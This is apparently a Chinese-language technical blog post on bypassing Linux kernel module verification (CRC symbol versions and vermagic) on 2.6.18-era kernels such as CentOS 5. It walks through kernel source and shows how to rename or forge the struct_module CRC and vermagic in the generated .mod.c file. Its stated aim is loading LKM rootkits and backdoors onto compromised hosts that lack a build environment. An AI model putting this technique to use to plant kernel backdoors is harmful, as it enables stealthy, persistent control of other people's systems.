突破Linux内核模块校验机制

 1、 为什么要突破模块验证
Linux内核版本很多,升级很快,2个小内核版本中内核函数的定义可能都不一样,为了确保不一致的驱动程序导致kernel oops, 开发者加入了模块验证机制。它在加载内核模块的时候对模块进行校验, 如果模块与主机的一些环境不一致,就会加载不成功。
看下面一个例子,它简单的输出当期系统中的模块列表:
  1. #include <linux/kernel.h>
  2. #include <linux/module.h>
  3. #include <linux/init.h>
  4. #include <linux/version.h>
  5. #include <linux/string.h>
  6. #include <linux/list.h>
  7. MODULE_LICENSE("GPL");
  8. MODULE_AUTHOR("wzt");
  9. struct module *m = &__this_module;
  10. int print_module_test(void)
  11. {
  12. struct module *mod;
  13.        list_for_each_entry(mod, &m->list, list) {
  14. printk("%s\n", mod->name);
  15. }
  16. return NULL;
  17. }
  18. static int list_print_init(void)
  19. {
  20. printk("load list_print module.\n");
  21.        print_module_test();
  22.        return 0;
  23. }
  24. static void list_print_exit(void)
  25. {
  26. printk("unload list_print module.\n");
  27. }
  28. module_init(list_print_init);
  29. module_exit(list_print_exit);
复制代码

我们在centos5.3环境中编译一下:
[root@localhost list]# uname -a
Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
然后拷贝到另一台主机centos5.1xen上:
[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.18-53.el5xen #1 SMP Mon Nov 12 03:26:12 EST 2007 i686 i686 i386 GNU/Linux
用insmod加载:
[root@localhost ~]# insmod list.ko
insmod: error inserting 'list.ko': -1 Invalid module format
报错了,在看下dmesg的信息:
[root@localhost ~]# dmesg|tail -n 1
list: disagrees about version of symbol struct_module
先不管这是什么, 总之我们的模块在另一台2.6.18的主机中加载失败。 通常的做法是要在主机中对源代码进行编译,然后才能加载成功, 但是如果主机中缺少内核编译环境的话, 我们的rootkit就不能编译, 也不能安装在主机之中,这是多么尴尬的事情 。 没错, 这就是linux kernel开发的特点, 你别指望像windows驱动一样,编译一个驱动, 然后可以满世界去装^_^. 一些rootkit开发者抛弃了lkm类型rk的开发, 转而去打kmem, mem的注意,像sk,moodnt这样的rk大家都喜欢, 可以在用户层下动态patch内核,不需要编译环境, wget下来,install即可。 但是它也有很多缺点,比如很不稳定,而且在2.6.x后内核已经取消了kmem这个设备, mem文件也做了映射和读写的限制。 rk开发者没法继续sk的神话了。反过来, 如果我们的lkm后门不需要编译环境,也可以达到直接insmod的目的,这是件多么美好的事情,而且lkm后门更加稳定,还不用像sk在内核中添加了很 多自己的数据结构。

2、内核是怎么实现的
我们去看看内核在加载模块的时候都干了什么, 或许我们可以发现点bug, 然后做点手脚,欺骗过去:)
grep下dmesg里的关键字, 看看它在哪个文件中:
[root@localhost linux-2.6.18]# grep -r -i 'disagrees about' kernel/
kernel/module.c:             printk("%s: disagrees about version of symbol %s\n",
2.6.18/kernel/module.c:
insmod调用了sys_init_module这个系统调用, 然后进入load_module这个主函数,它解析elf格式的ko文件,然后加载到内核中:
  1. /* Allocate and load the module: note that size of section 0 is always
  2. zero, and we rely on this for optional sections. */
  3. static struct module *load_module(void __user *umod,
  4. unsigned long len,
  5. const char __user *uargs)
  6. {
  7. ...
  8. if (!check_modstruct_version(sechdrs, versindex, mod)) {
  9. err = -ENOEXEC;
  10. goto free_hdr;
  11. }
  12.        modmagic = get_modinfo(sechdrs, infoindex, "vermagic");
  13. /* This is allowed: modprobe --force will invalidate it. */
  14. if (!modmagic) {
  15. add_taint(TAINT_FORCED_MODULE);
  16. printk(KERN_WARNING "%s: no version magic, tainting kernel.\n",
  17. mod->name);
  18. } else if (!same_magic(modmagic, vermagic)) {
  19. printk(KERN_ERR "%s: version magic '%s' should be '%s'\n",
  20. mod->name, modmagic, vermagic);
  21. err = -ENOEXEC;
  22. goto free_hdr;
  23. }
  24. ...
  25. }
复制代码


check_modstruct_version就是用来计算模块符号的一些crc值,不相同就会出现我们在dmesg里看到的
“disagrees about version of symbol”信息。 get_modinfo取得了内核本身的vermagic值,然后用same_magic
函数和内核的vermagic去比较,不同也会使内核加载失败。 所以在这里,我们看到内核对模块验证的时候采用了2层验证的方法:模块crc值和vermagic检查。
继续跟踪check_modstruct_version, 现在的内核默认的都开启了CONFIG_MODVERSIONS, 如果没有指定这个选项,函数为空,我们的目的是要在As, Centos下安装模块,redhat不是吃干饭的, 当然开了MODVERSIONS选项。
  1. static inline int check_modstruct_version(Elf_Shdr *sechdrs,
  2. unsigned int versindex,
  3. struct module *mod)
  4. {
  5. const unsigned long *crc;
  6. struct module *owner;
  7.        if (!__find_symbol("struct_module", &owner, &crc, 1))
  8. BUG();
  9. return check_version(sechdrs, versindex, "struct_module", mod,
  10. crc);
  11. }
  12. __find_symbol找到了struct_module这个符号的crc值,然后调用check_version去校验:
  13. static int check_version(Elf_Shdr *sechdrs,
  14. unsigned int versindex,
  15. const char *symname,
  16. struct module *mod,
  17. const unsigned long *crc)
  18. {
  19. unsigned int i, num_versions;
  20. struct modversion_info *versions;
  21.        /* Exporting module didn't supply crcs? OK, we're already tainted. */
  22. if (!crc)
  23. return 1;
  24.        versions = (void *) sechdrs[versindex].sh_addr;
  25. num_versions = sechdrs[versindex].sh_size
  26. / sizeof(struct modversion_info);
  27.        for (i = 0; i < num_versions; i++) {
  28. if (strcmp(versions[i].name, symname) != 0)
  29. continue;
  30.             if (versions[i].crc == *crc)
  31. return 1;
  32. printk("%s: disagrees about version of symbol %s\n",
  33. mod->name, symname);
  34. DEBUGP("Found checksum %lX vs module %lX\n",
  35. *crc, versions[i].crc);
  36. return 0;
  37. }
  38. /* Not in module's version table. OK, but that taints the kernel. */
  39. if (!(tainted & TAINT_FORCED_MODULE)) {
  40. printk("%s: no version for \"%s\" found: kernel tainted.\n",
  41. mod->name, symname);
  42. add_taint(TAINT_FORCED_MODULE);
  43. }
  44. return 1;
  45. }
复制代码

它搜寻elf的versions小节, 循环遍历数组中的每个符号表,找到struct_module这个符号,然后去比较crc的值。现在有个疑问, versions小节是怎么链接到模块的elf文件中去的呢? 在看下编译后的生成文件, 有一个list.mod.c
[root@localhost list]# cat list.mod.c
  1. #include <linux/module.h>
  2. #include <linux/vermagic.h>
  3. #include <linux/compiler.h>
  4. MODULE_INFO(vermagic, VERMAGIC_STRING);
  5. struct module __this_module
  6. __attribute__((section(".gnu.linkonce.this_module"))) = {
  7. .name = KBUILD_MODNAME,
  8. .init = init_module,
  9. #ifdef CONFIG_MODULE_UNLOAD
  10. .exit = cleanup_module,
  11. #endif
  12. };
  13. static const struct modversion_info ____versions[]
  14. __attribute_used__
  15. __attribute__((section("__versions"))) = {
  16. { 0x89e24b9c, "struct_module" },
  17. { 0x1b7d4074, "printk" },
  18. };
  19. static const char __module_depends[]
  20. __attribute_used__
  21. __attribute__((section(".modinfo"))) =
  22. "depends=";
  23. MODULE_INFO(srcversion, "26DB52D8A56205333D414B9");
复制代码


这个文件是模块在编译的时候,调用了linux-2.6.18/scripts/modpost这个文件生成的。里面增加了2个小 节.gnu.linkonce.this_module和__versions。 __versions小节的内容就是一些字符串和值组成的数组,check_version就是解析这个小节去做验证。 这里还有一个MODULE_INFO宏用来生成模块的magic字符串,这个在以后的vermagic中要做验证。
先看下vermagic的格式:
[root@localhost list]# modinfo list.ko
filename:    list.ko
author:       wzt
license:        GPL
srcversion:     26DB52D8A56205333D414B9
depends:       
vermagic:    2.6.18-128.el5 SMP mod_unload 686 REGPARM 4KSTACKS gcc-4.1
这里可以看到vermagic跟内核版本,smp,gcc版本,内核堆栈大小都有关。
  1. /* First part is kernel version, which we ignore. */
  2. static inline int same_magic(const char *amagic, const char *bmagic)
  3. {
  4. amagic += strcspn(amagic, " ");
  5. bmagic += strcspn(bmagic, " ");
  6. return strcmp(amagic, bmagic) == 0;
  7. }
复制代码


same_magic忽略了对内核版本的判断, 直接比较后面的值。
3、怎样去突破
知道了内核是怎么实现的了, 下面开始想办法绕过这些验证:)
3.1 怎么突破crc验证:

在仔细看下代码:
  1. for (i = 0; i < num_versions; i++) {
  2. if (strcmp(versions[i].name, symname) != 0)
  3. continue;
  4.             if (versions[i].crc == *crc)
  5. return 1;
  6. printk("%s: disagrees about version of symbol %s\n",
  7. mod->name, symname);
  8. DEBUGP("Found checksum %lX vs module %lX\n",
  9. *crc, versions[i].crc);
  10. return 0;
  11. }
  12. /* Not in module's version table. OK, but that taints the kernel. */
  13. if (!(tainted & TAINT_FORCED_MODULE)) {
  14. printk("%s: no version for \"%s\" found: kernel tainted.\n",
  15. mod->name, symname);
  16. add_taint(TAINT_FORCED_MODULE);
  17. }
  18. return 1;
复制代码


check_version在循环中只是在寻找struct_module符号, 如果没找到呢? 它会直接返回1! 没错, 这是一个逻辑bug,在正常情况下,module必会有一个struct_module的符号, 这是modpost生成的。如果我们修改elf文件,把struct_module这个符号改名,岂不是就可以绕过crc验证了吗? 先做个实验看下:
.mod.c是由modpost这个工具生成的, 它在linux-2.6.18/scripts/Makefile.modpost文件中被调用, 去看下:
PHONY += __modpost
__modpost: $(wildcard vmlinux) $(modules:.ko=.o) FORCE
$(call cmd,modpost)
我们用一个很土的方法, 就是在编译模块的时候,modpost生成.mod.c文件后, 暂停下编译,sleep 30秒吧,我们用这个时间去改写下.mod.c, 把struct_module换个名字。
PHONY += __modpost
__modpost: $(wildcard vmlinux) $(modules:.ko=.o) FORCE
$(call cmd,modpost)
@sleep 30
随便将struct_module改个名:
[root@localhost list]# cat list.mod.c
#include
#include
#include

MODULE_INFO(vermagic, VERMAGIC_STRING);

struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
};

static const struct modversion_info ____versions[]
__attribute_used__
__attribute__((section("__versions"))) = {
{ 0x89e24b9c, "stauct_module" },
{ 0x1b7d4074, "printk" },
};

static const char __module_depends[]
__attribute_used__
__attribute__((section(".modinfo"))) =
"depends=";

MODULE_INFO(srcversion, "26DB52D8A56205333D414B9");

我们是在centos5.3下编译的, 然后拷贝到centos5.1下, 在执行下insmod看下:
[root@localhost ~]# insmod list.ko
[root@localhost ~]# dmesg|tail
ata_piix
libata
sd_mod
scsi_mod
ext3
jbd
ehci_hcd
ohci_hcd
uhci_hcd
成功了! 这跟我们预期的一样, 我们用这个逻辑bug绕过了模块的crc验证! 这个bug直到2.6.31版本中
才得到修正。 我们可以用这种方法在redhat主机中任意安装模块了。 那么怎样绕过在2.6.31以后的内核呢?
看下它是怎么修补的:
  1. for (i = 0; i < num_versions; i++) {
  2. if (strcmp(versions[i].name, symname) != 0)
  3. continue;
  4. if (versions[i].crc == *crc)
  5. return 1;
  6. DEBUGP("Found checksum %lX vs module %lX\n",
  7. *crc, versions[i].crc);
  8. goto bad_version;
  9. }
  10. printk(KERN_WARNING "%s: no symbol version for %s\n",
  11. mod->name, symname);
  12. return 0;
  13. bad_version:
  14. printk("%s: disagrees about version of symbol %s\n",
  15. mod->name, symname);
  16.        return 0;
复制代码

如果没找到struct_module也会返回0, 这样我们就必须将struct_module的值改为正确后, 才能继续安装。
如何找到模块符号的crc值呢? 我们可以去找目标主机中那些已被系统加载的模块的crc值,如ext3文件系统
的模块, 自己写个程序去解析elf文件, 就可以得到某些符号的crc值了。
还有没有更简单的方法呢?去/boot目录下看看,symvers-2.6.18-128.el5.gz貌似和crc有关,gunzip解压后看看:
[root@localhost boot]# grep 'struct_module' symvers-2.6.18-128.el5
0x89e24b9c    struct_module vmlinux EXPORT_SYMBOL
原来内核中所有符号的crc值都保存在这个文件中。如何改写struct_module的值呢,可以用上面那个土方法,
或者自己写程序去解析elf文件, 然后改写其值。本文最后附上一个小程序用来修改elf的符号和crc值。
3.2 如何突破vermagic验证:
如果我们用list.mod.c中的做法, 用MODULE_INFO宏来生成一个与目标主机相同的vermagic呢? 答案是
否定的,gcc链接的时候会把modinfo小节链接在最后,加载模块的时候还是会读取第一个.modinfo小节。
我们可以用上面那种很土的方法, 先用modinfo命令得到目标主机中某个模块的信息:
[root@localhost list]# modinfo /lib/modules/2.6.18-128.el5/kernel/fs/ext3/ext3.ko
filename:    /lib/modules/2.6.18-128.el5/kernel/fs/ext3/ext3.ko
license:        GPL
description: Second Extended Filesystem with journaling extensions
author:       Remy Card, Stephen Tweedie, Andrew Morton, Andreas Dilger, Theodore Ts'o and others
srcversion:     B048AC103E5034604A721C5
depends:        jbd
vermagic:    2.6.18-128.el5 SMP mod_unload 686 REGPARM 4KSTACKS gcc-4.1
module_sig:     883f3504977495e4f3f897cd3dced211288209f551cc1da557f96ea18d9a4efd6cfb0fc2612e009c8845fd776c825d586f492ceab19e17b2319da8f
然后在用那个很土的方面, 将.mod.c中vermagic值进行修改。还有一种直接修改elf文件的方法,附录在本文后面。
4、总结
前面有一点没有提到, 就是某些内核版本的相同接口的函数代码可能已经变化, 这样在使用这项技术的时候, 最好在同一个大内核版本使用。你也可能感觉要想跨平台安装模块有些麻烦, 这里还有2个方法, 作为一个专业搞渗透的人来说,他会自己在本地装很多发行版本的linux,特别是root掉一台主机后,会在本地装一个一模一样的发行版本,smp、 kernel stack size、gcc version都一样。在本地机器装上开发环境,这样编译出来的模块也是可以直接装到目标主机上的,但这很麻烦,因为linux有太多的发行版本了:), 另一个方法就是自己装一个linux,编译下内核,然后将build后的开发包集成到自己的后门里, 压缩后大概几m。 然后传到主机去解压,编译。庆幸的是,现在大多数主机中都有内核开发环境, 直接去主机编译就ok了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值